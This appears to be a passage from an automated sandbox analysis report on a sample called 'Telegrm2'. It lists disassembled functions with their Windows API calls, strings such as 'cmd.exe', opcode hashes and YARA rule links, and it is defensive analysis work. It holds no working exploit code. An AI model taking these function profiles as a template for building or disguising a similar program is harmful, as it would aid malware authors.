                                            Function 030B4F58 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(?,?,000000FF,030B4FA1,?,?,00000028,030B5771,?,?,2800000000000000,030B532C,?,?,?,030B9B11), ref: 030B4F67
                                            • GetProcAddress.KERNEL32(?,?,000000FF,030B4FA1,?,?,00000028,030B5771,?,?,2800000000000000,030B532C,?,?,?,030B9B11), ref: 030B4F7C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 1646373207-1276376045
                                            • Opcode ID: a2fcaf62532c29e7fde41b5b5f8bf500e2a8f0a554bc3f4e24468edd8fd13a2e
                                            • Instruction ID: 8fac4d80b444b409e027e9d17ebffe3f9cc1811b8e52544209ce9194b6ec9d38
                                            • Opcode Fuzzy Hash: a2fcaf62532c29e7fde41b5b5f8bf500e2a8f0a554bc3f4e24468edd8fd13a2e
                                            • Instruction Fuzzy Hash: 5DD06251733B0182EE5A9B61A8A436453A87B58B81F4C7529981E07761DE2CC759C318
                                            Function 030B6894 Relevance: 6.4, APIs: 5, Instructions: 133COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B52FC: malloc.LIBCMT ref: 030B5327
                                              • Part of subcall function 030B52FC: Sleep.KERNEL32(?,?,?,030B9B11,?,?,?,030B9BBB,?,?,0000000D,030B4A1B,?,?,?,030B30B6), ref: 030B533A
                                            • free.LIBCMT ref: 030B69C0
                                            • free.LIBCMT ref: 030B69DC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$Sleepmalloc
                                            • String ID:
                                            • API String ID: 1995388493-0
                                            • Opcode ID: 39ce9d77a3e790452788de6fa24d85144c2e1ef8362bd983176990c83889e96e
                                            • Instruction ID: 07a9d2181676c468877a44cf0845bee8776c5483c8d87b66caa8710bdf26fbeb
                                            • Opcode Fuzzy Hash: 39ce9d77a3e790452788de6fa24d85144c2e1ef8362bd983176990c83889e96e
                                            • Instruction Fuzzy Hash: B1415636302B48A3DB15DF26E99029A73A8F784B94F4885299F8D4BB10DF39E566C704
                                            Function 030B9DC0 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                            • String ID:
                                            • API String ID: 27599310-0
                                            • Opcode ID: 41889bce521bb34fe621fe2299f3eb80cb8542ef2940ce9e9f208fbebfd8654c
                                            • Instruction ID: 4bfd0277ec7e213ace301bb1f267350118d26eb1f6fe954f25ee20107a9fb192
                                            • Opcode Fuzzy Hash: 41889bce521bb34fe621fe2299f3eb80cb8542ef2940ce9e9f208fbebfd8654c
                                            • Instruction Fuzzy Hash: C451113260B74086DB6ACB24E4847FEB7B6F785754F288925EB6B07724DB38D241C201
                                            Function 02DD0AFC Relevance: 6.2, APIs: 4, Instructions: 154COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd$BaseImage
                                            • String ID:
                                            • API String ID: 2482573191-0
                                            • Opcode ID: af5f9acc29257a75163b341382d3d9079731c94abf06afe1f914a7fc080a4b22
                                            • Instruction ID: 27bf406e978b73b8f1864e656e6fdcb8aa34541fdfcbed8fa62bab0034086814
                                            • Opcode Fuzzy Hash: af5f9acc29257a75163b341382d3d9079731c94abf06afe1f914a7fc080a4b22
                                            • Instruction Fuzzy Hash: 3741EA31158E054ED3147B2CD4452B972E2FBC432AF6485AED095C73A5EB74EC82C691
                                            Function 030C2EBC Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B3334: _getptd.LIBCMT ref: 030B3346
                                            • _errno.LIBCMT ref: 030C2EFA
                                            • _invalid_parameter_noinfo.LIBCMT ref: 030C2F04
                                            • _errno.LIBCMT ref: 030C2F28
                                            • _invalid_parameter_noinfo.LIBCMT ref: 030C2F32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno_invalid_parameter_noinfo$_getptd
                                            • String ID:
                                            • API String ID: 1297830140-0
                                            • Opcode ID: 396c473336910564f7a16b6ff122ee74b652f8fe8ab92f7bc44790f99b37dade
                                            • Instruction ID: 5db06c4894e35656a78fb8ade582b45f880002965dfa7e5072b986af27d37d9f
                                            • Opcode Fuzzy Hash: 396c473336910564f7a16b6ff122ee74b652f8fe8ab92f7bc44790f99b37dade
                                            • Instruction Fuzzy Hash: 9A41223A2267C486DB55EF25C5942AEBBA8F784BD0F588579DB894BF64CF38C046C700
                                            Function 02DCE7B4 Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2819658684-0
                                            • Opcode ID: ee74e047b5e6401e973330e134ad64bd7e3ff96d8a482232bd7c46c214a6dde7
                                            • Instruction ID: 1ef5ffc4a032af9726fe1c1f4e7fe7d3fa826c683675933810e9a89c1b595430
                                            • Opcode Fuzzy Hash: ee74e047b5e6401e973330e134ad64bd7e3ff96d8a482232bd7c46c214a6dde7
                                            • Instruction Fuzzy Hash: 47315A6061CB8B8AD70D4A2C94883397BC2EFAA305F3802BED186C7793DA71CC45C651
                                            Function 030B1B40 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Code$ErrorLastmallocrealloc
                                            • String ID:
                                            • API String ID: 797104909-0
                                            • Opcode ID: a80c1a447f23a93d993543f1d2932430f74ef1f993dbf219c17908ed45751a1a
                                            • Instruction ID: 1f4f8979058762a9b412851bd4e74d8bed2e5c62c177a286d01c930f946541c8
                                            • Opcode Fuzzy Hash: a80c1a447f23a93d993543f1d2932430f74ef1f993dbf219c17908ed45751a1a
                                            • Instruction Fuzzy Hash: B2415D36706B8487DB68DB16F8503AAB3B4FB88B94F084425DF8A47B54DF38D491C700
                                            Function 030C1144 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030C0748: _getptd.LIBCMT ref: 030C074C
                                            • _getptd.LIBCMT ref: 030C1183
                                              • Part of subcall function 030B4958: _amsg_exit.LIBCMT ref: 030B496E
                                            • _SetImageBase.LIBCMT ref: 030C1256
                                            • _getptd.LIBCMT ref: 030C1284
                                            • _getptd.LIBCMT ref: 030C1292
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd$BaseImage_amsg_exit
                                            • String ID:
                                            • API String ID: 2306399499-0
                                            • Opcode ID: 54d0943cbc92fb8e4200ef8782d5e7632cc2eb4bf62583c5f2efa29cc68ede7c
                                            • Instruction ID: f09a4bcc4f4997800ac567a175282711d18482717a28e25d96465c67c9e3ebb6
                                            • Opcode Fuzzy Hash: 54d0943cbc92fb8e4200ef8782d5e7632cc2eb4bf62583c5f2efa29cc68ede7c
                                            • Instruction Fuzzy Hash: EC31B73B6227C5C1CAA9E759D4802ADA7A4BBC1FD8F558619CE1D4B761CB38C096C700
                                            Function 02DC2A74 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno_getptd_invalid_parameter_noinfofree
                                            • String ID:
                                            • API String ID: 4053972703-0
                                            • Opcode ID: 23713fb59b6591edd0cf875b9b1ad7fa6c685f6b4e7a37dd8d801b22c82a6414
                                            • Instruction ID: 4e2644bdb0c2441cb2c615e235546703e6d34bfccc4c66364d8fc7f5aa1b389a
                                            • Opcode Fuzzy Hash: 23713fb59b6591edd0cf875b9b1ad7fa6c685f6b4e7a37dd8d801b22c82a6414
                                            • Instruction Fuzzy Hash: 86215630608F0A4FD744BF79985966AB7D2EB94351F10062EE99DC3365DB70DC418B92
                                            Function 030BEDFC Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2819658684-0
                                            • Opcode ID: f2c9db2c9b1e641511bfb90583653288b830ed2bc4f70586fa7c60f199126a67
                                            • Instruction ID: bdd481abc558eff2a60598f8838bb07d6d1edbe26e61f5da7249b5b65126358c
                                            • Opcode Fuzzy Hash: f2c9db2c9b1e641511bfb90583653288b830ed2bc4f70586fa7c60f199126a67
                                            • Instruction Fuzzy Hash: 5821353670A3C08AE749CB78F4503DE6BF5E3A5780F1C8462DB628B382D675C84AC741
                                            Function 030B5B2C Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _amsg_exit$_getptd_lockfree
                                            • String ID:
                                            • API String ID: 2148533958-0
                                            • Opcode ID: a742c6f52d255491b6b8e5ec65beb60ea10ecf4a0d0094295f580075148b9326
                                            • Instruction ID: 9c11e2015760621c71ac884a93208efa573d62f312fec4fcc9cf22c629e24d1e
                                            • Opcode Fuzzy Hash: a742c6f52d255491b6b8e5ec65beb60ea10ecf4a0d0094295f580075148b9326
                                            • Instruction Fuzzy Hash: D1110A2A217B8482DA95DB52E890BE9B3B5F785B80F4C41B5EB5E07355DF38C154C700
                                            Function 030B47F4 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                            Download Yara Rule
                                            APIs
                                            • FlsFree.KERNEL32(?,?,?,?,030B4382), ref: 030B4803
                                            • RtlDeleteCriticalSection.NTDLL ref: 030B9A43
                                            • free.LIBCMT ref: 030B9A4C
                                            • RtlDeleteCriticalSection.NTDLL ref: 030B9A73
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CriticalDeleteSection$Freefree
                                            • String ID:
                                            • API String ID: 1250194111-0
                                            • Opcode ID: 66e45fb4ed4c7c46c8d59f0427f6f79e842585fe759810a90be61511a68586aa
                                            • Instruction ID: 456bb4ba61552d735027f9ae8237ac5fd62458dac3395cb3f31f3e7e7dad539a
                                            • Opcode Fuzzy Hash: 66e45fb4ed4c7c46c8d59f0427f6f79e842585fe759810a90be61511a68586aa
                                            • Instruction Fuzzy Hash: 2211E132A13A40CBEB56CF56F861399B3B4F745BA0F5C5711EB5A02264CF38C581C740
                                            Function 030B303C Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Thread$CurrentErrorExitLastUser_freefls
                                            • String ID:
                                            • API String ID: 2333339018-0
                                            • Opcode ID: 5eb40a0f80f0850d9a35e1c55c6273f1e0d139bea646e80a20009f129abc2149
                                            • Instruction ID: 3e266a185b6e4d4d083639afd0e324e1cd42a90ee651938f5c1065d54a4fdd18
                                            • Opcode Fuzzy Hash: 5eb40a0f80f0850d9a35e1c55c6273f1e0d139bea646e80a20009f129abc2149
                                            • Instruction Fuzzy Hash: 7EF01D2D653B5586DF44EBB294683DD22BCAB89B84F244574CE9D4B315EE34C544C310
                                            Function 030B63FC Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _amsg_exit_getptd$_lock
                                            • String ID:
                                            • API String ID: 3670291111-0
                                            • Opcode ID: a0643d1eded0700a8c636b6ec8db5af65994715bcf966c78a0d9a49acebee4d1
                                            • Instruction ID: 5c7a2669e5eccf0cc3b5db85828715c30609f073cd1c93918656eb57507d6a68
                                            • Opcode Fuzzy Hash: a0643d1eded0700a8c636b6ec8db5af65994715bcf966c78a0d9a49acebee4d1
                                            • Instruction Fuzzy Hash: 37F01229213648C6EF55EBA2C860BEC63B1FBD5B44F5D4278CA5D0F791DF288550C711
                                            Function 030A2A50 Relevance: 6.0, APIs: 4, Instructions: 29synchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                            • String ID:
                                            • API String ID: 3360349984-0
                                            • Opcode ID: 7ec8991d8e7ba380ce2ba135d182d7ed855463916c5f2a3eec3c41204f7881e0
                                            • Instruction ID: 55f4149132e5246c6332011bf5bccd50014b2cf51e59e2ef2c130d2ed5e3e504
                                            • Opcode Fuzzy Hash: 7ec8991d8e7ba380ce2ba135d182d7ed855463916c5f2a3eec3c41204f7881e0
                                            • Instruction Fuzzy Hash: 01F04F32629B8083E715CF75B86475B77A6F3C5750F14A225FA9E42B68CF3CC155CA04
                                            Function 030A26D0 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CancelEventclosesocketsetsockopt
                                            • String ID:
                                            • API String ID: 852421847-0
                                            • Opcode ID: e40bbd37a51d8472f3c7ef4493497414e2ab08d8669d51031812fb7bf0656f87
                                            • Instruction ID: 3bec20d568656d645dd18aa92089ede03659c5296ad71ad552d0fbe66ab903b9
                                            • Opcode Fuzzy Hash: e40bbd37a51d8472f3c7ef4493497414e2ab08d8669d51031812fb7bf0656f87
                                            • Instruction Fuzzy Hash: 5CF03A36214A4197E7128F2AE554369B370F788BA4F604326DBBD43BE4CF79C5A9CB04
                                            Function 02DD1A7C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: csm$csm
                                            • API String ID: 3186804695-3733052814
                                            • Opcode ID: 5e3fd1bce8c838ab5e03e450a674cda2890a01e6717efc304ddca7fd09c103c4
                                            • Instruction ID: 072a2c9ec4e8c1443bd3de080f6051980199c024f9881c015d4609a7dafc1d7a
                                            • Opcode Fuzzy Hash: 5e3fd1bce8c838ab5e03e450a674cda2890a01e6717efc304ddca7fd09c103c4
                                            • Instruction Fuzzy Hash: C4517A30208E098FCB689E6C8484769B3E1FB99315F55566EE48EC7751EB30DC81CB86
                                            Function 030C20C4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _getptd.LIBCMT ref: 030C20E8
                                              • Part of subcall function 030B4958: _amsg_exit.LIBCMT ref: 030B496E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _amsg_exit_getptd
                                            • String ID: csm$csm
                                            • API String ID: 4217099735-3733052814
                                            • Opcode ID: 0fb900c977df7729467da3d1e4a237d7b8c1839ac7c3a61885ca547e096186e4
                                            • Instruction ID: a8722f4cf74fc61e7d22ad65e70933d09b9b52fe0fac26cc353461cecbee99e7
                                            • Opcode Fuzzy Hash: 0fb900c977df7729467da3d1e4a237d7b8c1839ac7c3a61885ca547e096186e4
                                            • Instruction Fuzzy Hash: 1C51AD362267C48ACF64DF2A94407ADB7A8F395B84F088929DF9957F54CB38C491CB01
                                            Function 030BD904 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B3334: _getptd.LIBCMT ref: 030B3346
                                            • _errno.LIBCMT ref: 030BD84C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 030BD857
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno_getptd_invalid_parameter_noinfo
                                            • String ID: cmd.exe
                                            • API String ID: 2821341848-723907552
                                            • Opcode ID: 6bb3ef0341254033a1ae4b8fc9ce9c722228a831ce72fc07b8cc9b68aa2e9a3d
                                            • Instruction ID: 20be5eb0372dcb5d8314c9b80552fd8543b0210ef52e6cc7e33dbcd2ae3b5dfc
                                            • Opcode Fuzzy Hash: 6bb3ef0341254033a1ae4b8fc9ce9c722228a831ce72fc07b8cc9b68aa2e9a3d
                                            • Instruction Fuzzy Hash: 7021D0266167C483D7A1CF1594501FEEBB1E3C1BE6B2C8565EADA07AA8DE38C045C701
                                            Function 030C620B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: csm$csm
                                            • API String ID: 3186804695-3733052814
                                            • Opcode ID: 555398e5980b487e9e009697ac2a2729449aa239f87add3a7f4129832fafa7ea
                                            • Instruction ID: aa96e06267095ffc2d7ab8c74ecf6fa33cedce5779e7f2aee3f72c6bbd359b59
                                            • Opcode Fuzzy Hash: 555398e5980b487e9e009697ac2a2729449aa239f87add3a7f4129832fafa7ea
                                            • Instruction Fuzzy Hash: E021C873111A88CADB74CF65C48429C3B75F358B9DF8E1259EA4D0BB58C776C491C784
                                            Function 030C630B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030C0B80: _getptd.LIBCMT ref: 030C0B8D
                                              • Part of subcall function 030C0B80: _getptd.LIBCMT ref: 030C0BA0
                                            • _getptd.LIBCMT ref: 030C636C
                                            • _getptd.LIBCMT ref: 030C637F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: csm
                                            • API String ID: 3186804695-1018135373
                                            • Opcode ID: 0823c4f16c7668c2dc7ecc085f6ba2655160086dba77f6e56002bc23cd01c85c
                                            • Instruction ID: fc09806669e049d44a86a7e2d6b86668c688dc9c1ebfaf2833f906174eae439e
                                            • Opcode Fuzzy Hash: 0823c4f16c7668c2dc7ecc085f6ba2655160086dba77f6e56002bc23cd01c85c
                                            • Instruction Fuzzy Hash: 4D01283A162789CACF74EF32D8502AC33A8FB95B59F5D4129DA4D0F605CB32C594C709
                                            Function 030BFC18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                            Download Yara Rule
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 030BFC36
                                              • Part of subcall function 030B581C: RaiseException.KERNEL32 ref: 030B5897
                                            • std::exception::exception.LIBCMT ref: 030BFC70
                                              • Part of subcall function 030B3854: std::exception::operator=.LIBCMT ref: 030B3870
                                            Strings
                                            • regular expression error, xrefs: 030BFC20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$ExceptionRaisestd::exception::operator=
                                            • String ID: regular expression error
                                            • API String ID: 958326869-2947193470
                                            • Opcode ID: 54dc49ab9a36d59352b8a96441749410c586f1224bf269000d358555d745d810
                                            • Instruction ID: 8627b608334170564da92a3b264f98179622b3e128efb2ae6c4cad4080dc6f8f
                                            • Opcode Fuzzy Hash: 54dc49ab9a36d59352b8a96441749410c586f1224bf269000d358555d745d810
                                            • Instruction Fuzzy Hash: A3F0817A615B8A92CB24CF55F5913897374F398384F505411DB8D47B28DB7CC699CB00
                                            Function 030AF130 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                            Download Yara Rule
                                            APIs
                                            • SHGetKnownFolderPath.SHELL32 ref: 030AF166
                                            • wsprintfW.USER32 ref: 030AF184
                                              • Part of subcall function 030AEF20: FindFirstFileW.KERNEL32 ref: 030AEFF0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: FileFindFirstFolderKnownPathwsprintf
                                            • String ID: %s%s
                                            • API String ID: 2506083511-3252725368
                                            • Opcode ID: cf0cb94e8e76bd572306bd30864732f376da17c4046eae9bd0e18817c63ecf81
                                            • Instruction ID: 875fe19dc45bbb7b1b1481f3f0f7316cb7fbb58c5866770378245bffd2aeac48
                                            • Opcode Fuzzy Hash: cf0cb94e8e76bd572306bd30864732f376da17c4046eae9bd0e18817c63ecf81
